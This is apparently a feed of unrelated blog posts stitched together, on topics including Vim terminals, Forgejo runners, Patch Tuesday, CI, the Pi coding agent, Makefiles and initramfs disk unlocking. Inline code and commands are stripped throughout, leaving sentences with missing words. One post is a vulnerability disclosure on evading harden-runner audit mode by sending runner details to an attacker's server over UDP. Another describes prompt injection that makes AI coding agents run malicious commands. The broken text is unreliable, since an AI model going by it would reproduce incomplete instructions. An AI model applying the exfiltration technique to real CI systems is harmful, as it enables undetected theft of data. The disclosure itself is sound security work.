Sooner or later every Vim user needs to drop to a shell – to run tests, check git status, or just poke around. Vim gives you two very different ways to do this: the old-school suspend and the newer command. Let’s look at both. Pressing in Vim sends a signal that suspends the entire Vim process and drops you back to your shell. When you’re done, type to bring Vim back exactly where you left it. You can also use or from command mode if you prefer. Vim 8.1 (released in May 2018) introduced – a built-in terminal emulator that runs inside a Vim window. This was a pretty big deal at the time, as I’ll explain in a moment. The basics are simple: In Neovim the key mapping to exit terminal mode is the same ( ), but you can also set up a more ergonomic alternative like by adding to your config. One of the most useful aspects of is running a specific command: The expands to the current filename, which makes this a quick way to test whatever you’re working on without leaving Vim. The output stays in a buffer you can scroll through and even yank from – handy when you need to copy an error message. You might be wondering how compares to the classic command. The main difference is that blocks Vim until the command finishes and then shows the output in a temporary screen – you have to press Enter to get back. runs the command in a split window, so you can keep editing while it runs and the output stays around for you to review. For quick one-off commands like or , bang commands are fine. For anything with longer-running output – tests, build commands, interactive REPLs – is the better choice. The story of is intertwined with the story of Neovim. When Neovim was forked from Vim in early 2014, one of its key goals was to add features that Vim had resisted for years – async job control and a built-in terminal emulator among them. Neovim shipped its terminal emulator (via libvterm) in 2015, a full three years before Vim followed suit. It’s fair to say that Neovim’s existence put pressure on Vim to modernize. Bram Moolenaar himself acknowledged that “Neovim did create some pressure to add a way to handle asynchronous jobs.” Vim 8.0 (2016) added async job support, and Vim 8.1 (2018) brought the terminal emulator. Competition is a wonderful thing. Here’s the honest truth: I rarely use . Not in Vim, and not the equivalent in Emacs either ( , , etc.). I much prefer switching to a proper terminal emulator – these days that’s Ghostty for me – where I get my full shell experience with all the niceties of a dedicated terminal (proper scrollback, tabs, splits, ligatures, the works). I typically have Vim in one tab/split and a shell in another, and I switch between them with a keystroke. I get that I might be in the minority here. Many people love having everything inside their editor, and I understand the appeal – fewer context switches, everything in one place. If that’s your style, is a perfectly solid option. But if you’re already comfortable with a good terminal emulator, don’t feel pressured to move your shell workflow into Vim just because you can. That’s all I have for you today. Keep hacking! Dead simple – no configuration, works everywhere. You get your real shell with your full environment, aliases, and all. Zero overhead – Vim stays in memory, ready to resume instantly. You can’t see Vim and the shell at the same time. Easy to forget you have a suspended Vim session (check with ). Doesn’t work in GUIs like gVim or in terminals that don’t support job control. – opens a terminal in a horizontal split – opens it in a vertical split – switches from Terminal mode back to Normal mode (so you can scroll, yank text, etc.)

0 views
Rik Huijzer 3 weeks ago

Raspberry Pi as Forgejo Runner

In my instructions on how to setup [Forgejo with a runner](/posts/55), I used a Hetzner server for the runner. This costs roughly 5 euros per month, so 60 euro annually. A full Hetzner server might be a bit overkill for a simple runner. Especially if you are just running Shell scripts or static site generation. The Hetzner server supports things like high bandwidth, low latency, unique IPv4 address, high uptime guarantees. Most of these are not necessary for your own runner. Therefore, in many cases it's probably a good idea to run the Runner on your own hardware. What I have tested and work...

0 views
devansh 1 months ago

[CVE-2026-25598] Bypassing Outbound Connections Detection in harden-runner

GitHub Actions have become a prime vector for supply chain attacks , with attackers exploiting workflow misconfigurations to exfiltrate secrets, deploy malware, or pivot to downstream CI/CD pipelines. Notable incidents, such as the widespread compromise of tj-actions/changed-files in March 2025 (which affected over 23,000 repositories and leaked secrets via modified action versions) highlight this risk. Ephemeral runners can leak sensitive data if outbound traffic is not tightly controlled. Egress traffic —outbound connections from workflows—remains a significant blind spot, enabling data theft through techniques such as DNS tunneling, HTTP beacons, or raw socket communication. To mitigate these threats, the ecosystem has spawned specialized GitHub Actions focused on runner hardening. We will discuss about one such action i.e. Step Security's It is a widely adopted CI/CD security agent that functions similarly to an endpoint detection and response (EDR) tool for GitHub Actions runners. It monitors network egress, enforces domain/IP allowlists, audits file integrity, and detects process anomalies in real time, including in untrusted workflows triggered by pull requests or issue comments. Tools like these often utilize eBPF hooks or iptables to enforce network policies at runtime. They aim to provide "set-it-and-forget-it" protection by detecting and preventing exfiltration attempts. These controls are particularly valuable in public repositories or environments where third-party actions and untrusted contributions introduce elevated risk. Harden-runner monitors outbound connections through network syscalls. Most tools and commands trigger detectable patterns. But UDP, with its connectionless nature, presented an interesting attack surface. some UDP syscalls behave differently enough that they fall outside the monitoring scope. What follows are three practical techniques that exploited this gap. Note: This vulnerability only affected audit mode. When using egress-policy: block, these connections are properly blocked. It requires the attacker to already have code execution capabilities within the GitHub Actions workflow (e.g., through workflow injection or compromised dependencies) Affected Versions A minimal PoC for demonstrating how to evade harden-runner and make outbound connections + exfil data 1- Set up a GitHub repo with the following workflow: 2- Spin up a VPS, obtain public IPv4 3- Run the following Python UDP Server 4- Open a Issue in the repository, and add the following comment: Note: Replace with your VPS IP address (where UDP listener is running) 5- Runner name and OS version will be exfiltrated to your VPS's UDP listener 6- No outbound connection to your VPS will be detected by StepSecurity The payload uses to output a complete, compilable C source file to , which is then compiled with and executed. The generated source code is as follows (with minor formatting for clarity): What it does? The payload executes a shell command that leverages to generate a complete, compilable C source file and redirect it to . This file is subsequently compiled using into an executable named , which is then run immediately. The generated source code is as follows (with minor formatting for clarity): What it does? The payload executes a shell command that leverages to generate a complete, compilable C source file and redirect it to . This file is subsequently compiled using into an executable named , which is then run immediately. The generated source code requires for support and is as follows (with minor formatting for clarity): What it does? These bypasses highlight a fundamental challenge in CI/CD security monitoring, the gap between what tools observe and what the underlying system permits. While effectively monitors common network patterns through standard syscalls like and high-level APIs, the raw socket interface—particularly UDP's connectionless syscalls presented a harder detection problem. The three techniques demonstrated ( , , and ) exploit this blind spot not through sophisticated evasion, but by leveraging legitimate kernel interfaces that fall outside the monitoring scope. Key Takeaways: GitHub Advisory: CVE-2026-25598 The vulnerability has been patched in harden-runner v2.14.2 for the Community Tier. CVE-2026-25598 Bypass using sendto Bypass using sendmsg Bypass using sendmmsg Closing Thoughts Harden-Runner Community Tier: All versions prior to v2.14.2 Harden-Runner Enterprise Tier: NOT AFFECTED Creates a UDP socket. Prepares a destination address structure for the specified IP and port 1053. Collects system details using and . Formats a message (e.g., "R:hostname,O:Linux 5.15.0"). Sends the message via without establishing a connection. Creates a UDP socket. Prepares a destination address structure for the specified IP and port 1053. Collects system details using and . Formats a message (e.g., "R:hostname,O:Linux 5.15.0"). Sends the message via using an and structure without establishing a connection. Creates a UDP socket. Prepares a destination address structure for the specified IP and port 1053. Collects system details using and . Formats a message (e.g., "R:hostname,O:Linux 5.15.0"). Sends the message via using an structure (wrapping a single with ) without establishing a connection; designed for batch sending but used here for one message. Closes the socket. Audit mode has inherent limitations : These bypasses only affect audit mode. The block mode properly prevents these connections, reinforcing that enforcement is more effective than observation alone. UDP monitoring is harder than TCP : The connectionless nature of UDP means there's no "connection establishment" phase to hook into, making detection more challenging.

0 views
Krebs on Security 1 months ago

Patch Tuesday, February 2026 Edition

Microsoft today released updates to fix more than 50 security holes in its Windows operating systems and other software, including patches for a whopping six “zero-day” vulnerabilities that attackers are already exploiting in the wild. Zero-day #1 this month is CVE-2026-21510 , a security feature bypass vulnerability in Windows Shell wherein a single click on a malicious link can quietly bypass Windows protections and run attacker-controlled content without warning or consent dialogs. CVE-2026-21510 affects all currently supported versions of Windows. The zero-day flaw  CVE-2026-21513 is a security bypass bug targeting MSHTML , the proprietary engine of the default Web browser in Windows. CVE-2026-21514 is a related security feature bypass in Microsoft Word. The zero-day CVE-2026-21533 allows local attackers to elevate their user privileges to “SYSTEM” level access in Windows Remote Desktop Services . CVE-2026-21519 is a zero-day elevation of privilege flaw in the Desktop Window Manager (DWM), a key component of Windows that organizes windows on a user’s screen. Microsoft fixed a different zero-day in DWM just last month . The sixth zero-day is CVE-2026-21525 , a potentially disruptive denial-of-service vulnerability in the Windows Remote Access Connection Manager , the service responsible for maintaining VPN connections to corporate networks. Chris Goettl at Ivanti reminds us Microsoft has issued several out-of-band security updates since January’s Patch Tuesday. On January 17, Microsoft pushed a fix that resolved a credential prompt failure when attempting remote desktop or remote application connections. On January 26, Microsoft patched a zero-day security feature bypass vulnerability ( CVE-2026-21509 ) in Microsoft Office . Kev Breen at Immersive notes that this month’s Patch Tuesday includes several fixes for remote code execution vulnerabilities affecting GitHub Copilot and multiple integrated development environments (IDEs), including VS Code , Visual Studio , and JetBrains products. The relevant CVEs are CVE-2026-21516 , CVE-2026-21523 , and CVE-2026-21256 . Breen said the AI vulnerabilities Microsoft patched this month stem from a command injection flaw that can be triggered through prompt injection, or tricking the AI agent into doing something it shouldn’t — like executing malicious code or commands. “Developers are high-value targets for threat actors, as they often have access to sensitive data such as API keys and secrets that function as keys to critical infrastructure, including privileged AWS or Azure API keys,” Breen said. “When organizations enable developers and automation pipelines to use LLMs and agentic AI, a malicious prompt can have significant impact. This does not mean organizations should stop using AI. It does mean developers should understand the risks, teams should clearly identify which systems and workflows have access to AI agents, and least-privilege principles should be applied to limit the blast radius if developer secrets are compromised.” The  SANS Internet Storm Center  has a  clickable breakdown of each individual fix this month from Microsoft, indexed by severity and CVSS score. Enterprise Windows admins involved in testing patches before rolling them out should keep an eye on askwoody.com , which often has the skinny on wonky updates. Please don’t neglect to back up your data if it has been a while since you’ve done that, and feel free to sound off in the comments if you experience problems installing any of these fixes.

0 views
matklad 1 months ago

CI In a Box

I wrote , a thin wrapper around ssh for running commands on remote machines. I want a box-shaped interface for CI: That is, the controlling CI machine runs a user-supplied script, whose status code will be the ultimate result of a CI run. The script doesn’t run the project’s tests directly. Instead, it shells out to a proxy binary that forwards the command to a runner box with whichever OS, CPU, and other environment required. The hard problems are in the part: CI discourse amuses me — everyone complains about bad YAML, and it is bad, but most of the YAML (and associated reproducibility and debugging problems) is avoidable. Pick an appropriate position on a dial that includes What you can’t just do by writing a smidgen of text is getting the heterogeneous fleet of runners. And you need heterogeneous fleet of runners if some of the software you are building is cross-platform. If you go that way, be mindful that The SSH wire protocol only takes a single string as the command, with the expectation that it should be passed to a shell by the remote end. In other words, while SSH supports syntax like , it just blindly intersperses all arguments with a space. Amusing to think that our entire cloud infrastructure is built on top of shell injection ! This, and the need to ensure no processes are left behind unintentionally after executing a remote command, means that you can’t “just” use SSH here if you are building something solid. One of them is not UNIX. One of them has licensing&hardware constraints that make per-minute billed VMs tricky (but not impossible, as GitHub Actions does that). All of them are moving targets, and require someone to do the OS upgrade work, which might involve pointing and clicking . writing a bash script, writing a script in the language you already use , using a small build system , using a medium-sized one like or , or using a large one like or .

0 views
Brain Baking 1 months ago

Favourites of January 2026

The end of the start of another year has ended. So now all there is left to do is to look forward to the end of the next month, starting effective immediately, and of course ending after the end of the end we are going to look forward to. Quite the end-eavour. I guess I’ll end these ramblings by ending this paragraph. But not before this message of general interest: children can be very end-earing, but sometimes you also want to end their endless whining! Fin. Previous month: January 2026 . Is Emacs a game? I think it is. I spent every precious free minute of my time tinkering with my configuration, exploring and discovering all the weird and cool stuff the editor and the thousands of community-provided packages offer. You can tell when you’ve joined the cult when you’re exchanging emails with random internet strangers about obscure Elisp functions and even joining the sporadic “let’s share Emacs learnings!” video calls (thanks Seb ). Does receiving pre-ordered games count as played ? I removed the shrink wrap from Ruffy and my calendar tells me I should start ordering UFO 50 very very soon via . Now if only that stupid Emacs config would stabilise; perhaps then I could pick up the Switch again… The intention was to start learning Clojure but I somehow got distracted after learning the Emacs CIDER REPL is the one you want. A zoomed-out top-down view of the project, centered on Brain Baking (left) and Jefklak's Codex (right). Related topics: / metapost / By Wouter Groeneveld on 4 February 2026.  Reply via email . Nathan Rooy created a very cool One million (small web) screnshots project and explains the technicalities behind it. Browsing to find your blog (mine are in there!) is really cool. It’s also funny to discover the GenAI purple-slop-blob. Brain Baking is located just north of a small dark green lake of expired domain name screenshots. Jefklak’s Codex , being much more colourful, is located at the far edge, to the right of a small Spaceship-domain-shark lake: Shom Bandopadhaya helped me regain my sanity with the Emacs undo philosophy. Install vundo. Done. Related: Sacha Chua was writing and thinking about time travel with Emacs, Org mode, and backups . I promise there’ll be non-Emacs related links in here, somewhere! Keep on digging! Michael Klamerus reminded me the BioMenace remaster is already out there. I loved that game as a kid but couldn’t get past level 3 or 4. It’s known to be extremely difficult. Or I am known to be a noob. Lars Ingebrigtsen combats link rot with taking screenshots of external links . I wrote about link rot a while ago and I must say that’s a genius addition. On hover, a small screenshot appears to permanently frame the thing you’re pointing to. I need to think about implementing this myself. Seb pointed me towards Karthinks’ Emacs window management almanac , a wall of text I will have to re-read a couple of times. I did manage to write a few simple window management helper functions that primarily do stuff with only a 2-split, which is good enough. Mikko shared his Board Gaming Year recap of 2025 . Forest Shuffle reaching 500 plays is simply insane, even if you take out the BoardGameArena numbers. Alex Harri spent a lot of time building an image-to-ASCII renderer and explains how the project was approached. This Precondition Guide to Home Row Mods is really cool and with Karabiner Elements in MacOS totally possible. It will get messy once you start fiddling with the timing. Elsa Gonsiorowski wrote about Emacs Delete vs. Kill which again helped me build a proper mental state of what the hell is going on in this Alien editor. Matt Might shared shell scripts to improve your academic writing by simply scanning the text for so-called “weasel words”. Bad: We used various methods to isolate four samples Better: We isolated four samples . I must say, academic prose sure could use this script. Robert Lützner discovered and prefers it over Git . I’m interested in its interoperability with Git. Charles Choi tuned Emacs to write prose by modifying quite a few settings I have yet to dig into. A friend installed PiVPN recently. I hadn’t heard from that one just yet so perhaps it’s worth a mention here. KeepassXC is getting on my nerves. Perhaps I should simply use pass , the standard unix password manager. But it should also be usable by my wife so… Nah. Input is a cool flexible font system designed for code but also offers proportional fonts. I tried it for a while but now prefer… Iosevka for my variable pitch font. Here’s a random Orgdown cheat sheet that might be of use. With RepoSense it’s easy to visualise programmer activities across Git repositories. We’re using it to track student activities and make sure everyone participates. Tired of configuring tab vs space indent stuff for every programming language? Use EditorConfig , something that works across editors and IDEs.

0 views
Karan Sharma 1 months ago

CLIs are the New AI Interfaces

The industry is currently obsessed with defining standards for how Large Language Models (LLMs) should interact with software. We see a proliferation of SDKs, function calling schemas, and protocols like MCP (Model Context Protocol). They all aim to solve the same problem: bridging the gap between natural language intent and deterministic code execution. But we might be reinventing the wheel. The most effective tools for AI agents aren’t those wrapped in heavy “AI-native” integration layers. They are the tools that adhere to a philosophy established forty years ago: the command-line interface. An LLM’s native tongue is text. It reasons in tokens, generates strings, and parses patterns. The Unix philosophy, which emphasizes small tools, plain text interfaces, and standard streams, is accidentally the perfect protocol for AI interaction. Consider the anatomy of a well-behaved CLI: When you give an agent access to a robust CLI, you don’t need to define 50 separate function schemas. You give it a shell and a single instruction: “Figure it out using .” The current approach to agent tooling often involves dumping massive JSON schemas into the context window. Connecting to a standard MCP server might load dozens of tool definitions, involving thousands of tokens describing every possible parameter, before the user has even asked a question. This is “eager loading,” and it is expensive in terms of both latency and context window utilization. A CLI-driven approach is “lazy loaded.” The agent starts with zero knowledge of the tool’s internals. It burns zero tokens on schema definitions. Only when tasked with a specific goal does it invoke or . It retrieves exactly the information needed to construct the command, executes it, and parses the result. This reflects the professional intuition of a senior engineer. We rarely memorize documentation. Instead, we prioritize the ability to quickly discover and apply the specific flags required for the task at hand. To bridge the gap between a raw CLI and an agent’s reasoning, we can leverage the Skills pattern. This is an emerging standard for agent-based systems where capabilities are documented as self-contained units of knowledge. Instead of writing a Python wrapper that maps an API to a function call, you provide a Markdown file that explains when and why to use a specific CLI command. The agent uses this as a semantic index. Here is a snippet from a skill: When I ask an agent to “check for error spikes in the API gateway,” Claude identifies that this skill is relevant to the request and loads it on-demand. It sees the example, adapts the SQL query to the current context, and executes the CLI command. The Markdown file serves as a few-shot prompt, teaching the model how to use the tool effectively without rigid code constraints. I maintain similar skill sets for AWS, Kubernetes, and Nomad. The AWS skill doesn’t wrap boto3; it simply documents useful and commands. When a CLI doesn’t exist, the barrier to creating one has never been lower. Modern Python tooling, specifically with its inline script metadata, allows us to treat CLIs as disposable, single-file artifacts. I recently needed an agent to manage my Trello board. Rather than fighting with the Trello API documentation or looking for an abandoned library, I had the agent generate a CLI wrapper: This script is self-contained. It defines its own dependencies. It implements and automatically via . It took minutes to generate and immediately unlocked Trello capabilities for the agent. The strategic takeaway for SaaS founders and platform engineers is significant. Your CLI is no longer just a developer convenience; it is your primary AI API. We are moving past the era where a REST API and a web dashboard are sufficient. If your product lacks a terminal interface, you are locking out the growing workforce of AI agents. The “hobby” CLI wrappers built by enthusiasts, such as those for Notion, Jira, or Spotify, are no longer just developer conveniences. They are becoming critical infrastructure. They provide the stable, text-based interface required for agents to interact with these platforms reliably. If you want your platform to be AI-ready, don’t just build an MCP server. Build a great CLI. Make sure it supports . Write good man pages. The agents will figure out the rest. Discovery: explains capabilities without hallucination. Structure: provides deterministic output for parsing. Composition: Pipes ( ) allow complex workflows to be assembled on the fly. Browser Automation is brittle, slow, and breaks with every UI update. Direct API Integration puts the burden of schema management on the user. CLIs offer a stable, discoverable, and composable interface that agents can learn and use autonomously.

0 views
Armin Ronacher 1 months ago

Pi: The Minimal Agent Within OpenClaw

If you haven’t been living under a rock, you will have noticed this week that a project of my friend Peter went viral on the internet . It went by many names. The most recent one is OpenClaw but in the news you might have encountered it as ClawdBot or MoltBot depending on when you read about it. It is an agent connected to a communication channel of your choice that just runs code . What you might be less familiar with is that what’s under the hood of OpenClaw is a little coding agent called Pi . And Pi happens to be, at this point, the coding agent that I use almost exclusively. Over the last few weeks I became more and more of a shill for the little agent. After I gave a talk on this recently, I realized that I did not actually write about Pi on this blog yet, so I feel like I might want to give some context on why I’m obsessed with it, and how it relates to OpenClaw. Pi is written by Mario Zechner and unlike Peter, who aims for “sci-fi with a touch of madness,” 1 Mario is very grounded. Despite the differences in approach, both OpenClaw and Pi follow the same idea: LLMs are really good at writing and running code, so embrace this. In some ways I think that’s not an accident because Peter got me and Mario hooked on this idea, and agents last year. So Pi is a coding agent. And there are many coding agents. Really, I think you can pick effectively anyone off the shelf at this point and you will be able to experience what it’s like to do agentic programming. In reviews on this blog I’ve positively talked about AMP and one of the reasons I resonated so much with AMP is that it really felt like it was a product built by people who got both addicted to agentic programming but also had tried a few different things to see which ones work and not just to build a fancy UI around it. Pi is interesting to me because of two main reasons: And a little bonus: Pi itself is written like excellent software. It doesn’t flicker, it doesn’t consume a lot of memory, it doesn’t randomly break, it is very reliable and it is written by someone who takes great care of what goes into the software. Pi also is a collection of little components that you can build your own agent on top. That’s how OpenClaw is built, and that’s also how I built my own little Telegram bot and how Mario built his mom . If you want to build your own agent, connected to something, Pi when pointed to itself and mom, will conjure one up for you. And in order to understand what’s in Pi, it’s even more important to understand what’s not in Pi, why it’s not in Pi and more importantly: why it won’t be in Pi. The most obvious omission is support for MCP. There is no MCP support in it. While you could build an extension for it, you can also do what OpenClaw does to support MCP which is to use mcporter . mcporter exposes MCP calls via a CLI interface or TypeScript bindings and maybe your agent can do something with it. Or not, I don’t know :) And this is not a lazy omission. This is from the philosophy of how Pi works. Pi’s entire idea is that if you want the agent to do something that it doesn’t do yet, you don’t go and download an extension or a skill or something like this. You ask the agent to extend itself. It celebrates the idea of code writing and running code. That’s not to say that you cannot download extensions. It is very much supported. But instead of necessarily encouraging you to download someone else’s extension, you can also point your agent to an already existing extension, say like, build it like the thing you see over there, but make these changes to it that you like. When you look at what Pi and by extension OpenClaw are doing, there is an example of software that is malleable like clay. And this sets certain requirements for the underlying architecture of it that are actually in many ways setting certain constraints on the system that really need to go into the core design. So for instance, Pi’s underlying AI SDK is written so that a session can really contain many different messages from many different model providers. It recognizes that the portability of sessions is somewhat limited between model providers and so it doesn’t lean in too much into any model-provider-specific feature set that cannot be transferred to another. The second is that in addition to the model messages it maintains custom messages in the session files which can be used by extensions to store state or by the system itself to maintain information that either not at all is sent to the AI or only parts of it. Because this system exists and extension state can also be persisted to disk, it has built-in hot reloading so that the agent can write code, reload, test it and go in a loop until your extension actually is functional. It also ships with documentation and examples that the agent itself can use to extend itself. Even better: sessions in Pi are trees. You can branch and navigate within a session which opens up all kinds of interesting opportunities such as enabling workflows for making a side-quest to fix a broken agent tool without wasting context in the main session. After the tool is fixed, I can rewind the session back to earlier and Pi summarizes what has happened on the other branch. This all matters because for instance if you consider how MCP works, on most model providers, tools for MCP, like any tool for the LLM, need to be loaded into the system context or the tool section thereof on session start. That makes it very hard to impossible to fully reload what tools can do without trashing the complete cache or confusing the AI about how prior invocations work differently. An extension in Pi can register a tool to be available to the LLM to call and every once in a while I find this useful. For instance, despite my criticism of how Beads is implemented, I do think that giving an agent access to a to-do list is a very useful thing. And I do use an agent-specific issue tracker that works locally that I had my agent build itself. And because I wanted the agent to also manage to-dos, in this particular case I decided to give it a tool rather than a CLI. It felt appropriate for the scope of the problem and it is currently the only additional tool that I’m loading into my context. But for the most part all of what I’m adding to my agent are either skills or TUI extensions to make working with the agent more enjoyable for me. Beyond slash commands, Pi extensions can render custom TUI components directly in the terminal: spinners, progress bars, interactive file pickers, data tables, preview panes. The TUI is flexible enough that Mario proved you can run Doom in it . Not practical, but if you can run Doom, you can certainly build a useful dashboard or debugging interface. I want to highlight some of my extensions to give you an idea of what’s possible. While you can use them unmodified, the whole idea really is that you point your agent to one and remix it to your heart’s content. I don’t use plan mode . I encourage the agent to ask questions and there’s a productive back and forth. But I don’t like structured question dialogs that happen if you give the agent a question tool. I prefer the agent’s natural prose with explanations and diagrams interspersed. The problem: answering questions inline gets messy. So reads the agent’s last response, extracts all the questions, and reformats them into a nice input box. Even though I criticize Beads for its implementation, giving an agent a to-do list is genuinely useful. The command brings up all items stored in as markdown files. Both the agent and I can manipulate them, and sessions can claim tasks to mark them as in progress. As more code is written by agents, it makes little sense to throw unfinished work at humans before an agent has reviewed it first. Because Pi sessions are trees, I can branch into a fresh review context, get findings, then bring fixes back to the main session. The UI is modeled after Codex which provides easy to review commits, diffs, uncommitted changes, or remote PRs. The prompt pays attention to things I care about so I get the call-outs I want (eg: I ask it to call out newly added dependencies.) An extension I experiment with but don’t actively use. It lets one Pi agent send prompts to another. It is a simple multi-agent system without complex orchestration which is useful for experimentation. Lists all files changed or referenced in the session. You can reveal them in Finder, diff in VS Code, quick-look them, or reference them in your prompt. quick-looks the most recently mentioned file which is handy when the agent produces a PDF. Others have built extensions too: Nico’s subagent extension and interactive-shell which lets Pi autonomously run interactive CLIs in an observable TUI overlay. These are all just ideas of what you can do with your agent. The point of it mostly is that none of this was written by me, it was created by the agent to my specifications. I told Pi to make an extension and it did. There is no MCP, there are no community skills, nothing. Don’t get me wrong, I use tons of skills. But they are hand-crafted by my clanker and not downloaded from anywhere. For instance I fully replaced all my CLIs or MCPs for browser automation with a skill that just uses CDP . Not because the alternatives don’t work, or are bad, but because this is just easy and natural. The agent maintains its own functionality. My agent has quite a few skills and crucially I throw skills away if I don’t need them. I for instance gave it a skill to read Pi sessions that other engineers shared, which helps with code review. Or I have a skill to help the agent craft the commit messages and commit behavior I want, and how to update changelogs. These were originally slash commands, but I’m currently migrating them to skills to see if this works equally well. I also have a skill that hopefully helps Pi use rather than , but I also added a custom extension to intercept calls to and to redirect them to instead. Part of the fascination that working with a minimal agent like Pi gave me is that it makes you live that idea of using software that builds more software. That taken to the extreme is when you remove the UI and output and connect it to your chat. That’s what OpenClaw does and given its tremendous growth, I really feel more and more that this is going to become our future in one way or another. https://x.com/steipete/status/2017313990548865292 ↩ First of all, it has a tiny core. It has the shortest system prompt of any agent that I’m aware of and it only has four tools: Read, Write, Edit, Bash. The second thing is that it makes up for its tiny core by providing an extension system that also allows extensions to persist state into sessions, which is incredibly powerful. https://x.com/steipete/status/2017313990548865292 ↩

0 views
Fernando Borretti 1 months ago

Some Data Should Be Code

I write a lot of Makefiles . I use it not as a command runner but as an ad-hoc build system for small projects, typically for compiling Markdown documents and their dependencies. Like so: And the above graph was generated by this very simple Makefile: (I could never remember the automatic variable syntax until I made flashcards for them.) It works for simple projects, when you can mostly hand-write the rules. But the abstraction ceiling is very low. If you have a bunch of almost identical rules, e.g.: You can use pattern-matching to them into a “rule schema”, by analogy to axiom schemata: Which works backwards: when something in the build graph depends on a target matching , Make synthesizes a rule instance with a dependency on the corresponding file. But pattern matching is still very limited. Lately I’ve been building my own plain-text accounting solution using some Python scripts. One of the tasks is to read a CSV of bank transactions from 2019–2024 and split it into TOML files for each year-month, to make subsequent processing parallelizable. So the rules might be something like: I had to write a Python script to generate the complete Makefile. Makefiles look like code, but are data: they are a container format for tiny fragments of shell that are run on-demand by the Make engine. And because Make doesn’t scale, for complex tasks you have to bring out a real programming language to generate the Makefile. I wish I could, instead, write a file with something like this: Fortunately this exists: it’s called doit , but it’s not widely known. A lot of things are like Makefiles: data that should be lifted one level up to become code. Consider CloudFormation . Nobody likes writing those massive YAML files by hand, so AWS introduced CDK , which is literally just a library 1 of classes that represent AWS resources. Running a CDK program emits CloudFormation YAML as though it were an assembly language for infrastructure. And so you get type safety, modularity, abstraction, conditionals and loops, all for free. Consider GitHub Actions . How much better off would we be if, instead of writing the workflow-job-step tree by hand, we could just have a single Python script, executed on push, whose output is the GitHub Actions YAML-as-assembly? So you might write: Actions here would simply be ordinary Python libraries the CI script depends on. Again: conditions, loops, abstraction, type safety, we get all of those for free by virtue of using a language that was designed to be a language, rather than a data exchange language that slowly grows into a poorly-designed DSL. Why do we repeatedly end up here? Static data has better safety/static analysis properties than code, but I don’t think that’s foremost in mind when people design these systems. Besides, using code to emit data (as CDK does) gives you those exact same properties. Rather, I think some people think it’s cute and clever to build tiny DSLs in a data format. They’re proud that they can get away with a “simple”, static solution rather than a dynamic one. If you’re building a new CI system/IaC platform/Make replacement: please just let me write code to dynamically create the workflow/infrastructure/build graph. Or rather, a polyglot collection of libraries, one per language, like Pulumi .  ↩ Or rather, a polyglot collection of libraries, one per language, like Pulumi .  ↩

0 views
Andy Bell 1 months ago

It really is the year of the website

I keep talking about it so I’m finally doing it. You might be looking at my website right now, thinking “this looks a bit basic m8″ and you’d be right. It’s because I’m building this website in iterations. The version you see now is the “wireframe” shell version and there’s lots more versions to come. Today, I’ve published the first post of a series on Piccalilli where I redesign and re-build this thing in the open. The hope is that it inspires you to build and maintain your own corner of the internet. I’ve also been (borderline desperately) trying to think of something to write about in 2026. Doing more practical, building stuff is the direction I’ve landed on. It links back to what I was talking about in my end of year wrap up , in the Be human and improve your own skills section: There’s been a bit of a culture of “I don’t need to bother doing that because of AI” and let me tell you — from someone who has been doing this stuff for nearly 20 years — that is a dangerous position to put yourself in. No single technology has surpassed the need for personal development and genuine human intelligence. You should always be getting incrementally better at what you do. Now, what I am  not  saying is that you should be doing  work  work out of hours. You are not paid enough and frankly, the industry does not value you enough.  Value yourself by investing your time in skills that make you happy and fulfilled . In that section , I also say “make yourself, and maintain a personal website”. I’ve had a website for a long time, but I couldn’t really maintain it anymore because frankly, I build it with my elbows. The previous iteration served me well, sure, but I want something to learn the new stuff with, to enjoy working on and to embrace the art . Me writing about that as I go is just the cherry on the top. I hope you’ll follow along as I do that! You can read the first post in the series here .

0 views

remotely unlocking an encrypted hard disk

Your mission, should you choose to accept it, is to sneak into the earliest parts of the boot process, swap the startup config without breaking anything, and leave without a trace. Are you ready? Let's begin. In which our heroes are introduced, and the scene is set. For a very long time I had a beat-up old ThinkPad that couldn’t hold a charge for the life of it, especially when running Windows. It tended to die a lot when I was traveling, and I travel a lot. To save battery when I’m away from home, I often ssh back into my home desktop, both so I have persistent state even if my laptop battery dies, and so I get much faster builds that don’t kill the battery. This has two small problems: For a long time I solved 1. by enabling “Power On" after "Restore AC Power Loss” in the BIOS and 2. with tailscale . However, I recently installed Arch with an encrypted boot partition, which means that boot doesn’t finish until I type in the encryption password. Well. Well. What if I Simply put tailscale in initramfs? In which our intrepid heroes chart the challenges to come. Oh, right. If you weren’t aware, early boot in a Linux operating system 1 is just running a full second operating system that happens to be very small, lol. That’s loaded from a compressed archive file in /boot 2 and run from memory, with no access to persistent storage. This OS running from memory is called initramfs (initial RAM filesystem). So when you see a screen like this: That’s actually a whole-ass OS, with an PID and service management and everything. This is how, for example, can show you stats about early boot — there’s another copy of systemd running in initramfs, and it passes its state off to the one in the main OS. Well. That implies we can install things on it ^^. There’s three parts to this: We also want to make this as secure as possible, so there’s some more things to consider: We can solve this in a few ways: Some background about Tailscale’s ACLs (“access control lists”). Tailscale’s users are tied to their specific login method: you can, for example, add a passkey, but that passkey counts as a fully separate user than your original account. Tailscale also has “groups” of users, which are what they sound like, “ auto groups ”, which again are what they sound like, “hosts”, which are a machine connected to the network, and “tags”. Tags are odd, I haven't seen anything like them before. They group hosts, not users, and when you add a tag to a host, that counts as its login method , rather than the host being tied to a user account. A consequence of this is that the group does not include tagged machines, because tagged machines aren’t tied to a user account. (A second consequence is that you can’t remove all tags from a machine without logging out and logging back in to associate it with your user account.) So we can write a policy like this: This says “allow devices tied to a user account to access any other device, and allow no permissions at all for devices tied to a tag”. here is my desktop, and is its initramfs. 3 Because initramfs is just a (mostly) normal Linux system, that means it has its own PID 1. On Arch, that PID is in fact just systemd. That means that we can add systemd services to initramfs! There's a whole collection of them in ( is the tool Arch uses to regenerate initramfs). We need two services: an SSH server (I went with ) and something to turn on networking, which this collection names . It's possible to run directly, rather than having a separate SSH server, but I didn't find any way to configure tailscale's SSH command, and I don't want to let anyone have a shell in my initramfs. In which our heroes execute their plan flawlessly, sneaking in without a sound. If you follow these steps on an Arch system, you should end up with roughly the same setup as I have. Most of these commands assume you are running as root. Install the dropbear SSH server: Install the systemd packages: Add networking ( ), tailscale ( ), and dropbear ( ) to : Set up the keys for your new tailscale device: In the tailscale web console , mark your new device with , and disable key expiry. It should look something like this: In , configure dropbear to only allow running the unlock command and nothing else: Tell systemd to wait forever for a decryption password. I use , so I edited . Under , I extended the existing to . 4 Copy your public keys into so they get picked up by the dropbear hook: Generate a new public/private keypair for use by the dropbear server. Without this, the dropbear hook will try to load keys from openssh, which means they'll be shared between early boot and your normal server. In particular that would mean your SSH server private keys would be stored unencrypted in initramfs. Setup early networking. (Note: these instructions are only for Ethernet connections. If you want WiFi in early boot, good luck and 